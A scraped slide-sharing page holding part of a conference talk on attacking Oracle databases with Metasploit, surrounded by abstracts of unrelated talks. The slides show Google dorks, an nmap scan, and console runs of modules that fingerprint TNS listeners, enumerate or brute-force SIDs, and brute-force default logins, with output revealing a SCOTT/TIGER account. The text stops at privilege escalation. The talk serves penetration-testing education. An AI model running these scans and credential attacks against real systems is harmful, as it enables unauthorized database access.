The document discusses attacking Oracle databases using Metasploit. It provides an overview of the current Metasploit support for Oracle and new support being added, including TNS and Oracle mixins to simplify interactions. It then outlines an Oracle attack methodology involving locating systems, determining version/SID, bruteforcing credentials, escalating privileges via SQL injection in default packages, manipulating data, and covering tracks. Examples are given of modules that implement each part of the methodology.
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
Goals of this Presentation:
- Outline and provide an actionable methodology for effectively and efficiently testing for, and finding security vulnerabilities in web applications
- Cover common vulnerability classes/types/categories from a high level
- Provide useful tools and processes that you can take right out into the world to immediately improve your own bug hunting abilities
Every IR presents unique challenges. But - when an attacker uses PowerShell, WMI, Kerberos attacks, novel persistence mechanisms, seemingly unlimited C2 infrastructure and half-a-dozen rapidly-evolving malware families across a 100k node network to compromise the environment at a rate of 10 systems per day - the cumulative challenges can become overwhelming. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it.
Details a massive intrusion by Russian APT29 (AKA CozyDuke, Cozy Bear)
Modularizing a project is never easy, a lot of files to move and the dependencies between them is not always what we expect. Then the Dagger configuration used in a single module project often doesn't scale well to a multi module project. Hilt is opinionated about the configuration to use (we don't need to argue anymore about using component dependencies or subcomponents!) and this configuration works perfectly even in a multi module project. In this talk we'll see first an introduction to Hilt and a comparison with Dagger to understand why it's easier to configure. Then we'll see how to leverage it in a multi module project (both in a standard layered architecture and in a Clean Architecture that uses the Dependency Inversion) to improve build speed and code testability. Spoiler alert: using sample apps that include a single feature in the app helps a lot!
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
Goals of this Presentation:
- Outline and provide an actionable methodology for effectively and efficiently testing for, and finding security vulnerabilities in web applications
- Cover common vulnerability classes/types/categories from a high level
- Provide useful tools and processes that you can take right out into the world to immediately improve your own bug hunting abilities
Every IR presents unique challenges. But - when an attacker uses PowerShell, WMI, Kerberos attacks, novel persistence mechanisms, seemingly unlimited C2 infrastructure and half-a-dozen rapidly-evolving malware families across a 100k node network to compromise the environment at a rate of 10 systems per day - the cumulative challenges can become overwhelming. This talk will showcase the obstacles overcome during one of the largest and most advanced breaches Mandiant has ever responded to, the novel investigative techniques employed, and the lessons learned that allowed us to help remediate it.
Details a massive intrusion by Russian APT29 (AKA CozyDuke, Cozy Bear)
Modularizing a project is never easy, a lot of files to move and the dependencies between them is not always what we expect. Then the Dagger configuration used in a single module project often doesn't scale well to a multi module project. Hilt is opinionated about the configuration to use (we don't need to argue anymore about using component dependencies or subcomponents!) and this configuration works perfectly even in a multi module project. In this talk we'll see first an introduction to Hilt and a comparison with Dagger to understand why it's easier to configure. Then we'll see how to leverage it in a multi module project (both in a standard layered architecture and in a Clean Architecture that uses the Dependency Inversion) to improve build speed and code testability. Spoiler alert: using sample apps that include a single feature in the app helps a lot!
The top 10 windows logs event id's used v1.0Michael Gough
How to catch malicious activity on Windows systems using properly configured audit logging and the Top 10 events and more you must have enable, configured and alerting.
LOG-MD
MalwareArchaeology.com
UEFI Firmware Rootkits: Myths and RealitySally Feller
Earlier this month, we teased a proof of concept for UEFI ransomware which was presented at RSA Conference 2017. The HackingTeam, Snowden, Shadow Brokers, and Vault7 leaks have revealed that UEFI/BIOS implants aren't just a theoretical concept but have actually been weaponized by nation states to conduct cyber espionage. Physical access requirements are a thing of the past, these low level implants can be installed remotely by exploiting vulnerabilities in the underlying UEFI system.
Today at BlackHat Asia 2017, we are disclosing two vulnerabilities in two different models of the GIGABYTE BRIX platform:
GB-BSi7H-6500 – firmware version: vF6 (2016/05/18)
GB-BXi7-5775 – firmware version: vF2 (2016/07/19)
Phpconf 2013 - Agile Telephony Applications with PAMI and PAGIMarcelo Gornstein
This is the talk about PAMI and PAGI, and general telephony applications with PHP and Asterisk for the php conference argentina (phpconfar). The **complete** talk is available in the slides (in english), just download it (see above), and check out the slide notes for the complete text for each slide. Looking forward for your feedback. Enjoy :)
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
This talk (hopefully) provides some new pentesters tools and tricks. Basically a continuation of last year’s Dirty Little Secrets they didn’t teach you in Pentest class. Topics include; OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using metasploit.
The top 10 windows logs event id's used v1.0Michael Gough
How to catch malicious activity on Windows systems using properly configured audit logging and the Top 10 events and more you must have enable, configured and alerting.
LOG-MD
MalwareArchaeology.com
UEFI Firmware Rootkits: Myths and RealitySally Feller
Earlier this month, we teased a proof of concept for UEFI ransomware which was presented at RSA Conference 2017. The HackingTeam, Snowden, Shadow Brokers, and Vault7 leaks have revealed that UEFI/BIOS implants aren't just a theoretical concept but have actually been weaponized by nation states to conduct cyber espionage. Physical access requirements are a thing of the past, these low level implants can be installed remotely by exploiting vulnerabilities in the underlying UEFI system.
Today at BlackHat Asia 2017, we are disclosing two vulnerabilities in two different models of the GIGABYTE BRIX platform:
GB-BSi7H-6500 – firmware version: vF6 (2016/05/18)
GB-BXi7-5775 – firmware version: vF2 (2016/07/19)
Phpconf 2013 - Agile Telephony Applications with PAMI and PAGIMarcelo Gornstein
This is the talk about PAMI and PAGI, and general telephony applications with PHP and Asterisk for the php conference argentina (phpconfar). The **complete** talk is available in the slides (in english), just download it (see above), and check out the slide notes for the complete text for each slide. Looking forward for your feedback. Enjoy :)
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
This talk (hopefully) provides some new pentesters tools and tricks. Basically a continuation of last year’s Dirty Little Secrets they didn’t teach you in Pentest class. Topics include; OSINT and APIs, certificate stealing, F**king with Incident Response Teams, 10 ways to psexec, and more. Yes, mostly using metasploit.
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
Pentesting? What is Pentesting? Why Pentesting?
Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches
The following illustrates some of the common security challanges Node.js developers are up against. The presentation covers various types of JavaScript-related hacks and NoSQL injection hacking via Express and MongoDB.
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injectionStHack
La mouvance NoSQL fait de plus en plus parler d'elle. La plupart du temps open source, les implémentations sont nombreuses et offrent des alternatives intéressantes à la rigidité du SQL. Malheureusement ces diverses solutions NoSQL (MongoDB, CouchDB, Cassandra...) débarquent avec NoSecurity. Nous verrons que, tout comme le SQL, une mauvaise utilisation des clients/drivers peut avoir des conséquences tout aussi critique, si ce n'est plus...
This talk was given at DEF CON 2010 by Kuon Ding and Wayne Huang
https://www.defcon.org/html/defcon-18/dc-18-speakers.html#Huang
NOSQL == NO SQL INJECTIONS?
This is a short talk on NoSQL technologies and their impacts on traditional injection threats such as SQL injection. This talk surveys existing NoSQL technologies, and then demos proof-of-concept threats found with CouchDB. We then discuss impacts of NoSQL technologies to existing security technologies such as blackbox scanning, static analysis, and web application firewalls.
Web Application Security 101 - 06 AuthenticationWebsecurify
In part 6 of Web Application Security 101 we will look into vulnerabilities effecting the authentication system. You will learn about password bruteforce attacks, cracking captures, bypassing the login system and more.
La realización de un Test de Intrusión Físico tiene como finalidad conseguir acceso físico a una determinada ubicación, y no es una tarea sencilla. Requiere preparación, investigación, análisis, coordinación, mucha simulación y la aplicación de una metodología flexible que pueda adaptarse a las condiciones particulares de cada objetivo.
Analizar el entorno, evadir todo tipo de sistemas de seguridad física y colaborar en equipo (Red Team), son aspectos fundamentales para lograr la intrusión, y con ello posteriormente, el acceso a equipos, red y un sinfín de datos en las instalaciones del objetivo.Si quieres saber qué es un Red Team y profundizar en la realización de intrusiones físicas, esta es tu charla.
44CON 2014 - Pentesting NoSQL DB's Using NoSQL Exploitation Framework, Francis Alexander
The rise of NoSQL databases and their simplicity has made corporates as well as end users have started to move towards NoSQL,However is it safe?.Does NoSQL mean we will not have to worry about Injection attacks. Yes We Do. This paper concentrates on exploiting NoSQL DB’s especially with its reach towards Mongodb,Couchdb and Redis and automating it using the NoSQL Exploitation Framework.
Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritmasına Ait Bir Uygulama...Can K.
Bu çalışmada, istenilen kısıtlar altında uygun grupların ve bununla birlikte ilgili eşleştirmelerin oluşturulmasına olanak sağlayan “Kısıtlar İçerecek Şekilde Revize Edilmiş Atama Algoritması” önerilmiş ve bilgisayar ortamında (Python programlama dilinde) uygulaması gerçeklenmiştir. Uygulama sonuçlarına göre, standart atama algoritmasının uygun çözüm vermediği durumlarda verimli bir şekilde (makul sürede sonuç veren) uygun çözüme ulaşılmaktadır. Algoritmanın çeşitli eşleştirme problemlerine verimli bir şekilde çözüm verecek hale getirilmesinin seçim aşamasında belirtilen kısıtların ağırlıklandırılması değiştirilerek elde edilebileceği gösterilmiştir. Bu uygulamanın kullanılabilirliğini göstermek amacıyla, Ondokuz Mayıs Üniversitesi Bilgisayar Mühendisliği Bölümü bitirme projeleri seçiminde/dağıtımında kullanılacak şekilde özelleştirilme yapılmış ve proje gruplarının oluşturulması konusunda çeşitli değerlendirmeler yapılmıştır.
Fire & Ice: Making and Breaking macOS FirewallsPriyanka Aash
"In the ever raging battle between malicious code and anti-malware tools, firewalls play an essential role. Many a malware has been generically thwarted thanks to the watchful eye of these products.
However on macOS, firewalls are rather poorly understood. Apple's documentation surrounding it's network filter interfaces is rather lacking and all commercial macOS firewalls are closed source.
This talk aims to take a peek behind the proverbial curtain revealing how to both create and 'destroy' macOS firewalls.
In this talk, we'll first dive into what it takes to create an effective firewall for macOS. Yes we'll discuss core concepts such as kernel-level socket filtering—but also how to communicate with user-mode components, install privileged code in a secure manner, and simple ways to implement self-defense mechanisms (including protecting the UI from synthetic events).
Of course any security tool, including firewalls, can be broken. After looking at various macOS malware specimens that proactively attempt to detect such firewalls, we'll don our 'gray' (black?) hats to discuss various attacks against these products. And while some attacks are well known, others are currently undisclosed and can generically bypass even today's most vigilant Mac firewalls.
But all is not lost. By proactively discussing such attacks, combined with our newly-found understandings of firewall internals, we can improve the existing status quo, advancing firewall development. With a little luck, such advancements may foil, or at least complicate the lives of tomorrow's sophisticated Mac malware!"
Esta apresentação é baseada em uma pesquisa que publiquei em 2015 que tratava de malware do tipo mach-o, e o aumento de visibilidade do macOS como novo alvo. Nesta nova pesquisa, a ideia é mostrar algumas dicas sobre internals, kernel e principais ameaças que o macOS vem enfrentando.
linux device drivers: Role of Device Drivers, Splitting The Kernel, Classes of
Devices and Modules, Security Issues, Version Numbering, Building and Running Modules
Kernel Modules Vs. Applications, Compiling and Loading, Kernel Symbol Table,
Preliminaries, Interaction and Shutdown, Module Parameters, Doing It in User Space.
DTrace and SystemTap are dynamic tracing frameworks available for Solaris and Linux respectively. This session will give an overview of the static DTrace probes available in both Drizzle and MySQL and show numerous examples of scripts that utilize these probes. Mixing dynamic and static probes will also be discussed.
Docker moves very fast, with an edge channel released every month and a stable release every 3 months. Patrick will talk about how Docker introduced Docker EE and a certification program for containers and plugins with Docker CE and EE 17.03 (from March), the announcements from DockerCon (April), and the many new features planned for Docker CE 17.05 in May.
This talk will be about what's new in Docker and what's next on the roadmap
This session will use Novell Open Enterprise Server 2 SP2 to demonstrate how to cluster critical services—from NSS and Novell iPrint to Novell GroupWise, AFP and beyond. We'll cover the new features of Novell Cluster Services in the latest release of Novell Open Enterprise Server, and we'll show you how you can ensure consistency by using AutoYaST to build your nodes. This will be a practical session, so be prepared for a few thrills and spills along the way!
Speakers:
Tim Heywood CTO NDS 8
Mark Robinson CTO Linux NDS8
Similar to Attacking Oracle with the Metasploit Framework (20)
Contrary to most presentations and blog posts there is more to AWS than S3. In a quest to create more re-usable code we have created WeirdAAL (AWS Attack Library). Offensively, WeirdAAL helps you answer the “what can I do with this AWS key”? We aim to answer that question, in a blackbox way, via recon modules and modules specifically dedicated to attack each of the interesting AWS service offerings while avoiding detection. It also provides multiple functions sorted by AWS service that you can use for both offensive and defensive checks.
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Chris Gates
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable process. It is extremely rare that a vulnerability causes a direct risk to an environment, it is usually what the attacker DOES with the access gained that matters. In this talk, we will discuss the way that Internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the Defensive teams to measure the environments resistance to the attacks. We will demonstrate attacks, capabilities, TTP’s tracking, trending, positive metrics, hunt integration and most of all we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team. Sparring and training every day to be ready for the fight when it comes to us. This is an update to our 2016 Brucon talk. We plan to discuss what have we accomplished regarding the above in the last year. We plan to show how we have progressed with the automation of attacker activities and event generation using MITRE’s Cyber Analytics Repository & CAR Exploration Tool (CARET) along with pumping these results to Unfetter (https://iadgov.github.io/unfetter/) for aggregation and display in a useful format.
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
DevOps toolchains are transforming modern IT, but hackers can undermine their benefits through poorly implemented or vulnerable DevOps tools. Chris Gates and Ken Johnson will share their collaborative attack research into the technology driving DevOps. They will share an attacker's perspective on exploiting DevOps organizations and the countermeasures these organizations should employ.
RSAC 2017
Ken Johnson & Chris Gates
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Chris Gates
Brucon 2016
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable process. It is extremely rare that a vulnerability causes a direct risk to an environment, it is usually what the attacker DOES with the access gained that matters. In this talk we will discuss the way that Internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the Defensive teams to measure the environments resistance to the attacks. We will demonstrate attacks, capabilities, TTP’s tracking, trending, positive metrics, hunt integration and most of all we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team. Sparring and training every day to be ready for the fight when it comes to us.
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...Chris Gates
Sector 2016 Chris Gates & Haydn Johnson
Purple Teaming is conducting focused Red Teams with clear training objectives for the Blue Team for the ultimate goal of improving the organization’s overall security posture. The popular opinion is that Purple Teaming requires a big undertaking. This is not true and we will show practical exercises for Purple Teaming for varying levels of organizational maturity using the Cyber Kill Chain[1] as our framework.
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016Chris Gates
In a follow-up to the duo’s offensive focused talk “DevOops, How I hacked you”, they discuss defensive countermeasures and real experiences in preventing attacks that target flaws in your DevOps environments. In this talk, Chris and Ken describe common ways in which DevOps environments fall prey to malicious actors with a focus on preventative steps. The team will present their recommended approach to hardening for teams using AWS, Continuous Integration, GitHub, and common DevOps tools and processes. More specifically, the following items will be demonstrated:
-AWS Hardening
-AWS Monitoring
-AWS Disaster Recovery
-GitHub Monitoring
-OPINT
-Software Development Practices/Processes
-Secure use of Jenkins/Hudson
-Developer laptop hardening (OS X)
Going Purple : From full time breaker to part time fixer: 1 year later Chris Gates
A little over a year ago I made the transition from external security consultant to internal offensive security engineer at Facebook. I went from a full time breaker to part time fixer. This talk is aimed at providing lessons learned and documenting the mindset changes I've made over the last year that I feel can be used by the industry as a whole. I've broken the lessons learned into three primary buckets; Red, Blue, and Purple and the talk will hopefully bring value to anyone working in their respective bucket or assist in their creation/continuing of purple teaming at their company.
DevOops & How I hacked you DevopsDays DC June 2015Chris Gates
In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates and Ken Johnson will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. This talk will most definitely be an entertaining one but a cautionary tale as well, provoking attendees into action. Ultimately, this is research targeted towards awareness for those operating within a DevOps environment.
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Chris Gates
In a rare mash-up, DevOps is increasingly blending the work of both application and network security professionals. In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates (carnal0wnage) and Ken Johnson (cktricky) will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. Everything from common misconfigurations to remote code execution will be presented. This is research to bring awareness to those responsible for securing a DevOps environment.
In a rare mash-up, DevOps is increasingly blending the work of both application and network security professionals. In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates (carnal0wnage) and Ken Johnson (cktricky) will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. Everything from common misconfigurations to remote code execution will be presented. This is research to bring awareness to those responsible for securing a DevOps environment.
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
2. Who Are We?
Chris Gates
<cg [@] metasploit.com>
What pays the bills
Pentester/Security Consultant
Security Blogger
http://carnal0wnage.attackresearch.com
Security Twit
Carnal0wnage
Want more?
Chris Gates + carnal0wnage + maltego
3. Who Are We?
Mario Ceballos
<mc [@] metasploit.com>
What do I do?
Vulnerability Research/Exploit Development.
Metasploit Framework Developer.
Focus is on auxiliary and exploit modules.
Pentesting for some company.
5. Why Oracle?
Why the focus on Oracle?
Been on lots of pentests & seen lots of potential
targets.
The Oracle business model allows for free
downloads of products, but you pay for updates. The
result is tons of potential shells.
Privilege escalation and data theft is pretty easy,
but shells are always better.
6. Why Oracle?
Why the focus on Oracle?
Some support is provided by the commercial attack
frameworks, but really don’t have much coverage for
non-memory corruption vulns.
Other tools that target Oracle.
Inguma
Orasploit (not public)
Pangolin (if you want to give your hard earned shell back to
.cn)
A few free commercial products focused on vulnerability
assessment rather than exploitation.
7. Current Metasploit Support
Some support for Oracle is already provided.
Exploit modules.
Handful of memory corruption modules that target earlier
versions of Oracle and some of its other applications.
Auxiliary modules.
Handful of modules that assist in discovering the SID,
identifying the version, sql injection (file-format), post
exploitation, and a ntlm stealer.
8. New Metasploit Support
Introduction of a TNS Mixin.
Handles a basic TNS packet structure.
"(CONNECT_DATA=(COMMAND=#{command}))”
Used for some of our auxiliary modules.
Used for our TNS exploits.
Introduction of a ORACLE Mixin.
Handles our direct database access.
Dependencies:
Oracle Instant Client.
ruby-dbi.
ruby-oci8.
http://trac.metasploit.com/wiki/OracleUsage
9. New Metasploit Support (cont.)
Introduction of a ORACLE Mixin.
Exposes a few methods.
connect()
Establishes a database handle.
disconnect()
Disconnect all database handles.
preprare_exec()
Prepares a statement then executes it.
10. New Metasploit Support (cont.)
Introduction of a ORACLE Mixin.
Really makes things simple.
msf auxiliary(sql) > set SQL "select * from global_name"
SQL => select * from global_name
msf auxiliary(sql) > run
[*] Sending SQL...
[*] ORCL.REGRESS.RDBMS.DEV.US.ORACLE.COM
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(sql) >
11. Oracle Attack Methodology
We need 4 things to connect to an Oracle DB.
IP.
Port.
Service Identifier (SID).
Username/Password.
14. Locate Oracle Systems
Nmap.
Look for common oracle ports 1521-1540,1158,5560
cg@attack:~$ nmap -sV 192.168.0.100 -p 1521
Starting Nmap 4.90RC1 ( http://nmap.org )
Interesting ports on 192.168.0.100:
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS Listener 10.2.0.1.0 (for 32-bit
Windows)
15. Locate Oracle Systems
Google.
Google dorks to locate Oracle systems.
intitle:iSQL intitle:Release inurl:isqlplus intitle:10.1
inurl:pls/portal
"Index of" "Oracle-HTTP-Server" Server at Port "Last modified" 1.3.12
www.red-database-security.com/wp/google_oracle_hacking_us.pdf
Yahoo dorks? to locate Oracle systems.
intitle:iSQL intitle:Release inurl:isqlplus
inurl:pls/portal
“Oracle-HTTP-Server" Server at Port "Last modified" 1.3.12
www.red-database-security.com/wp/yahoo_oracle_hacking_us.pdf
17. Oracle Attack Methodology
Locate a system running Oracle.
Determine Oracle Version.
Determine Oracle SID.
Guess/Bruteforce USER/PASS.
Privilege Escalation via PL/SQL Injection.
Manipulate Data/Post Exploitation.
Cover Tracks.
18. Oracle Attack Methodology
Determine Oracle Version.
tns_packet(“(CONNECT_DATA=(COMMAND=VERSION))”)
msf auxiliary(tnslsnr_version) > set RHOSTS 172.10.1.107-172.10.1.110
RHOSTS => 172.10.1.107-172.10.1.110
msf auxiliary(tnslsnr_version) > run
[*] Host 172.10.1.107 is running: Solaris: Version 9.2.0.1.0 – Production
[*] Host 172.10.1.108 is running: Linux: Version 11.1.0.6.0 - Production
[*] Host 172.10.1.109 is running: 32-bit Windows: Version 10.2.0.1.0 - Production
[*] Auxiliary module execution completed
msf auxiliary(tnslsnr_version) > db_notes
[*] Time: Fri May 29 16:09:41 -0500 2009 Note: host=172.10.1.107 type=VERSION Solaris:
Version 9.2.0.1.0 – Production
…
[*] Time: Fri May 29 16:09:44 -0500 2009 Note: host=172.10.1.109 type=VERSION data=32-
bit Windows: Version 10.2.0.1.0 - Production
msf auxiliary(tnslsnr_version) >
19. Oracle Attack Methodology
Locate a system running Oracle.
Determine Oracle Version.
Determine Oracle SID.
Guess/Bruteforce USER/PASS.
Privilege Escalation via SQL Injection.
Manipulate Data/Post Exploitation.
Cover Tracks.
20. Oracle Attack Methodology
Determine Oracle Service Identifier (SID).
tns_packet(“(CONNECT_DATA=(COMMAND=STATUS))”)
By querying the TNS Listener directly, brute force for
default SID's or query other components that may
contain it.
msf auxiliary(sid_enum) > run
[*] Identified SID for 172.10.1.107: PLSExtProc
[*] Identified SID for 172.10.1.107 : acms
[*] Identified SERVICE_NAME for 172.10.1.107 : PLSExtProc
[*] Identified SERVICE_NAME for 172.10.1.107 : acms
[*] Auxiliary module execution completed
msf auxiliary(sid_enum) > run
[-] TNS listener protected for 172.10.1.109...
[*] Auxiliary module execution completed
21. Oracle Attack Methodology
Determine Oracle SID.
By quering the TNS Listener directly, brute force for
default SID's or query other components that may
contain it.
msf auxiliary(sid_brute) > run
[*] Starting brute force on 172.10.1.109, using sids
from /home/cg/evil/msf3/dev/data/exploits/sid.txt...
[*] Found SID 'ORCL' for host 172.10.1.109.
[*] Auxiliary module execution completed
22. Oracle Attack Methodology
Determine Oracle SID.
By quering the TNS Listener directly, brute force for
default SID's or query other components that may
contain it.
msf auxiliary(sid_enum) > run
[-] TNS listener protected for 172.10.1.108...
[*] Auxiliary module execution completed
msf auxiliary(sid_enum) > use auxiliary/scanner/oracle/spy_sid
msf auxiliary(spy_sid) > run
[*] Discovered SID: ‘orcl' for host 172.10.1.108
[*] Auxiliary module execution completed
msf auxiliary(spy_sid) >
24. Oracle Attack Methodology
Determine Oracle SID.
Enterprise Manager Console.
Query other components that may contain it.
msf auxiliary(sid_enum) > run
[-] TNS listener protected for 172.10.1.108...
[*] Auxiliary module execution completed
msf auxiliary(sid_enum) > use auxiliary/scanner/oracle/oas_sid
msf auxiliary(oas_sid) > run
[*] Discovered SID: ‘orcl' for host 172.10.1.109
[*] Auxiliary module execution completed
msf auxiliary(oas_sid) >
25. Oracle Attack Methodology
Locate a system running Oracle.
Determine Oracle Version.
Determine Oracle SID.
Guess/Bruteforce USER/PASS.
Privilege Escalation via SQL Injection.
Manipulate Data/Post Exploitation.
Cover Tracks.
26. Oracle Attack Methodology
Determine Oracle Username/Password.
Brute Force For Known Default Accounts.
msf auxiliary(login_brute) > set SID ORCL
SID => ORCL
msf auxiliary(login_brute) > run
.
[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[*] Auxiliary module execution completed
msf auxiliary(login_brute) > db_notes
[*] Time: Sat May 30 08:44:09 -0500 2009 Note: host=172.10.1.109
type=BRUTEFORCED_ACCOUNT data=SCOTT/TIGER
27. Oracle Attack Methodology
Locate a system running Oracle.
Determine Oracle Version.
Determine Oracle SID.
Guess/Bruteforce USER/PASS.
Privilege Escalation via SQL Injection.
Manipulate Data/Post Exploitation.
Cover Tracks.
28. Oracle Attack Methodology
Privilege Escalation via SQL Injection.
